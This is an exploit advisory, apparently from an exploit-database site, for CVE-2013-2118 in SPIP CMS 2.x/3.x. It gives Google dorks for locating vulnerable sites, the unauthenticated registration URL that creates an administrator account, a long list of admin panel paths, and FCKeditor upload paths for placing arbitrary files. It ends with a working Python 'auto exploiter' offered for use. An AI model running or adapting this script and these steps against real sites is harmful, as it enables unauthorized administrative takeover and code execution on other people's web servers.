Spip CMS 2.x/3.x Add Administrator Account & Insert File Vulnerability

2019.03.26
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-286


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################################################ # Exploit Title : Spip CMS 2.x/3.x Add Administrator Account & Insert File Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Published Date : 26/03/2019 # First Discovered Date : 2013 - 2014 # Vendor Homepage : spip.net # Software Download Links : files.spip.org/spip/archives/ files.spip.net/spip/archives/SPIP-v2-1.16.zip files.spip.net/spip/archives/SPIP-v2-0-9.zip files.spip.net/spip/archives/SPIP-v2-1.22.zip files.spip.net/spip/archives/SPIP-v2-0-23.zip files.spip.net/spip/archives/SPIP-v3.0.9.zip # Software Information Link : spip.net/rubrique25.html # Software Affected Versions : Spip 2.x - 3.x - 3.0.9 / 2.0.0 - 2.0.10 - 2.0.20 - 2.1.5 - 2.1.22 / 2.0.23 - 2.1.15 3.0.0 - 3.0.1 - 3.0.x - All Spip CMS 2.x - 3.x Version # Solution : Update/Upgrade to Higher Version to 3.1.0 and higher # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Google Dorks : inurl:/spip.php?rubrique site:fr inurl:/spip.php?article site:fr # CVE : cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2118 cvedetails.com/cve/CVE-2013-2118/ # Vulnerability Type : CWE-286 [ Incorrect User Management ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Cyberizm.Org Reference Link : cyberizm.org/cyberizm-spip-cms-2-0-admin-panele-erisim-acigi.html ############################################################################################ # Description about Software : *************************** SPIP is a free software content management system. SPIP is a publishing system for the Internet in which great importance is a ttached to collaborative working, to multilingual environments, and to simplicity of use for web authors. It is free software, distributed under the GNU/GPL licence. This means that it can be used for any Internet site, whether personal or institutional, non-profit or commercial. SPIP is developed (programmed, documented, translated, etc.) and used by a community in which there is an open invitation to participate. ############################################################################################ # According to the CVE-2013-2118 : ******************************** SPIP 3.0.x before 3.0.9, 2.1.x before 2.1.22, and 2.0.x before 2.0.23 allows remote attackers to gain privileges and "take editorial control" via vectors related to ecrire/inc/filtres.php. ############################################################################################ # Impact : *********** The software SPIP 2.x/3.x does not properly manage a user within its environment. This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated. To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail. Users can be assigned to the wrong group class of permissions resulting in unintended access rights to sensitive objects. Spip 2.x/3.x is prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. ############################################################################################ # Vulnerable File Source Code : [ filtres.php ] *************************************** File => /ecrire/inc/filtres.php core.spip.net/projects/spip/repository/revisions/20541/entry/branches/spip-2.1/ecrire/inc/filtres.php # Vulnerability : ************** Add New Administrator/Author Account /spip.php?page=identifiants&mode=0minirezo It says : "Vous inscrire sur ce site " means " Register to this Site. After Registration - it says : Votre nouvel identifiant vient de vous être envoyé par email. Your new login details has just been sent to you by email. Register yourself - Give a Random Nickname and Your Real E-Mail Address. The System will send you automatically a password for Admin/Author Login. There is Auto Exploiter down. You can use this. # Admin Panel Login Path : ************************ /ecrire /spip.php?page=login&url=%2Fecrire%2F /?page=login&lang=fr # Useable Admin Control Panel URL Links : *************************************** /ecrire/?exec=accueil /ecrire/?bonjour=oui /ecrire/?exec=rubrique_edit&new=oui /ecrire/?exec=rubriques_edit&new=oui /IMG/html/.... /IMG/txt/... /IMG/jpg/... /IMG/gif/.. /IMG/png/... /ecrire/?exec=recherche /ecrire/?exec=articles /ecrire/?exec=article_edit&new=oui /ecrire/?exec=articles_edit&new=oui /ecrire/?exec=article&id_article=[ID-NUMBER] /ecrire/?exec=articles&id_article=[ID-NUMBER] /ecrire/?exec=articles_edit&id_article=[ID-NUMBER] /ecrire/?exec=naviguer&id_rubrique=[ID-NUMBER] /ecrire/?exec=rubriques_edit&id_rubrique=[ID-NUMBER]&retour=nav /ecrire/?exec=rubriques_edit&new=oui&id_parent=[ID-NUMBER] /ecrire/?exec=mot_edit&new=oui /ecrire/?exec=site_edit&new=oui /ecrire/?exec=breve_edit&new=oui /ecrire/?exec=breve_edit&new=oui&id_rubrique=[ID-NUMBER] /ecrire/?exec=auteurs /ecrire/?exec=auteur_edit&new=oui /ecrire/?exec=auteurs&statut=0minirezo /ecrire/?exec=auteur_edit&id_auteur=[AUTHOR-ID-NUMBER] /ecrire/?exec=auteurs&statut=1comite /ecrire/?exec=auteur&id_auteur=[ID-NUMBER] /ecrire/?exec=message_edit&new=oui&to=[ID-NUMBER]&redirect=.%2F%3Fexec%3Dauteur%26amp%3Bid_auteur%3D[ID-NUMBER] /ecrire/?exec=auteurs&statut=!0minirezo,1comite,5poubelle /ecrire/?exec=statistiques_referers /ecrire/?exec=rubriques /ecrire/?exec=rubrique&id_rubrique=[ID-NUMBER] /ecrire/?exec=rubrique_edit&id_rubrique=[ID-NUMBER] /ecrire/?exec=article_edit&id_article=[ID-NUMBER] /ecrire/?exec=brouteur /ecrire/?exec=clevermail /ecrire/?exec=clevermail_lists /ecrire/?exec=clevermail_list_edit&lst_id=-1 /ecrire/?exec=clevermail_subscribers /ecrire/?exec=clevermail_subscriber_new /ecrire/?exec=clevermail_settings_edit /ecrire/?exec=forum /ecrire/?exec=forum&repondre=[ID-NUMBER] /ecrire/?exec=calendrier /ecrire/?exec=messages /ecrire/?exec=message&id_message=[ID-NUMBER] /ecrire/?exec=message_edit&id_message=[ID-NUMBER] /ecrire/?exec=documents /ecrire/?exec=document_edit&id_document=[ID-NUMBER] /ecrire/?exec=documents&statut=publie /ecrire/?exec=documents&statut=publie&media=image /ecrire/?exec=documents&statut=publie&media=audio /ecrire/?exec=documents&statut=publie&media=video /ecrire/?exec=documents&statut=publie&media=file /ecrire/?exec=documents&media=file&statut=publie /ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle /ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=oui /ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non /ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non&orphelins=1 /ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non&brise=1 /ecrire/?exec=documents&statut=publie&media=file&extension=html&ajouter=oui /ecrire/?exec=mots /ecrire/?exec=groupe_mots_edit&id_groupe=[ID-NUMBER] /ecrire/?exec=mot_edit&new=oui&id_groupe=[ID-NUMBER]&redirect=.%2F%3Fexec%3Dmots /ecrire/?exec=sites /ecrire/?exec=site&id_syndic=[ID-NUMBER] /ecrire/?exec=site_edit&id_syndic=[ID-NUMBER] /ecrire/?exec=breves /ecrire/?exec=breve&id_breve=[ID-NUMBER] /ecrire/?exec=breve_edit&id_breve=[ID-NUMBER] /ecrire/?exec=message&id_message=[ID-NUMBER] /ecrire/?exec=message_edit&id_message=[ID-NUMBER] /ecrire/?exec=revision&id_objet=[ID-NUMBER]&objet=article&id_version=[ID-NUMBER] /ecrire/?exec=article_edit&id_article=[ID-NUMBER] /ecrire/?exec=infos_perso /spip.php?auteur[ID-NUMBER]&var_mode=preview /ecrire/?exec=visiteurs /ecrire/?exec=suivi_edito /ecrire/?exec=article&id_article=[ID-NUMBER] /ecrire/?exec=article_edit&id_article=[ID-NUMBER] /ecrire/?exec=synchro /ecrire/?exec=revisions /ecrire/?exec=revision&id_objet=[ID-NUMBER]&objet=article&id_version=[ID-NUMBER] /ecrire/?exec=article_edit&id_article=[ID-NUMBER] /ecrire/?exec=controler_forum /ecrire/?exec=controler_forum&type_message=interne /ecrire/?exec=controler_forum&type_message=vide /ecrire/?exec=stats_visites /ecrire/?exec=stats_referers /ecrire/?exec=stats_repartition /ecrire/?exec=stats_lang /ecrire/?exec=navigation&menu=menu_squelette /ecrire/?exec=configurer_mediabox /ecrire/?exec=zengarden /ecrire/?exec=configurer_sarkaspip&cfg=accueil /ecrire/?exec=admin_vider /ecrire/?exec=sauvegarder /ecrire/?exec=restaurer /ecrire/?exec=admin_tech /ecrire/?exec=job_queue /ecrire/?exec=configurer_identite /local/cache-vignettes/....... /IMG/png/.... /IMG/gif/..... /IMG/jpg/.... /ecrire/?exec=configurer_langue /ecrire/?exec=config_lang /ecrire/?exec=admin_tech /ecrire/?exec=admin_vider /ecrire/?exec=admin_plugin /ecrire/?exec=cfg /ecrire/?exec=configurer_multilang /ecrire/?exec=configurer_contenu /ecrire/?exec=configurer_interactions /ecrire/?exec=configurer_avancees /ecrire/?exec=admin_plugin /ecrire/?exec=admin_plugin&voir=tous /ecrire/?exec=admin_plugin&voir=actif /ecrire/?exec=admin_plugin&voir=inactif /ecrire/?exec=admin_plugin&voir=inactif&verrouille=tous /ecrire/?exec=admin_plugin&voir=inactif&verrouille=non /ecrire/?exec=configurer_forum /ecrire/?exec=configurer_revisions /ecrire/?exec=configurer_urls /ecrire/?exec=charger_plugin /ecrire/?exec=rubriques /ecrire/?exec=articles /ecrire/?exec=documents /ecrire/?exec=navigation&menu=menu_edition /ecrire/?exec=navigation&menu=menu_administration /ecrire/?exec=navigation&menu=menu_configuration /ecrire/?exec=configuration /ecrire/?exec=config_identite /ecrire/?exec=recherche&recherche= /spip.php?page=distrib /spip.php?article[ID-NUMBER]&lang=fr /ecrire/?exec=aide_index&var_lang=en # Arbitrary File Upload / Insert File Exploit : **************************************** /plugins/fckeditor-spip-2/fckeditor/editor/filemanager/connectors/uploadtest.html /plugins/auto/fckeditor-spip-2/fckeditor/editor/filemanager/connectors/uploadtest.html /plugins/fckeditor-spip-2-4/fckeditor/editor/filemanager/connectors/uploadtest.html /userfiles/.... /UserFiles/... /ecrire/?exec=article_edit&new=oui /ecrire/?exec=articles_edit&new=oui /IMG/html/[YOURFILENAME].html .jpg gif .png .txt /local/cache-vignettes/....... /IMG/png/.... /IMG/gif/..... /IMG/jpg/.... # Python Auto Exploiter : *********************** import urllib, urllib2 import cookielib import sys import re def send_request(urlOpener, url, post_data=None): request = urllib2.Request(url) url = urlOpener.open(request, post_data) return url.read() if len(sys.argv) < 4: print "SPIP < 3.x - 2.x - 3.0.9 / 2.1.22 / 2.0.23 exploit by KingSkrupellos Cyberizm Digital Security Team\n\tUsage: python script.py <SPIP base_url> <login> <mail>" exit() base_url = sys.argv[1] login = sys.argv[2] mail = sys.argv[3] cookiejar = cookielib.CookieJar() urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar)) formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo") print "[+] First request sended..." m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire) m = re.search("(?<=value=')[\w\+/=]*",m.group(0)); formulaire_data = {'var_ajax' : 'form', 'page' : 'identifiants', 'mode' : '0minirezo', 'formulaire_action' : 'inscription', 'formulaire_action_args' : m.group(0), 'nom_inscription' : login, 'mail_inscription' : mail, 'nobot' : '' } formulaire_data = urllib.urlencode(formulaire_data) send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data) print "[+] Second request sended" print "[+] You should receive an email with credentials soon :) " ############################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ############################################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top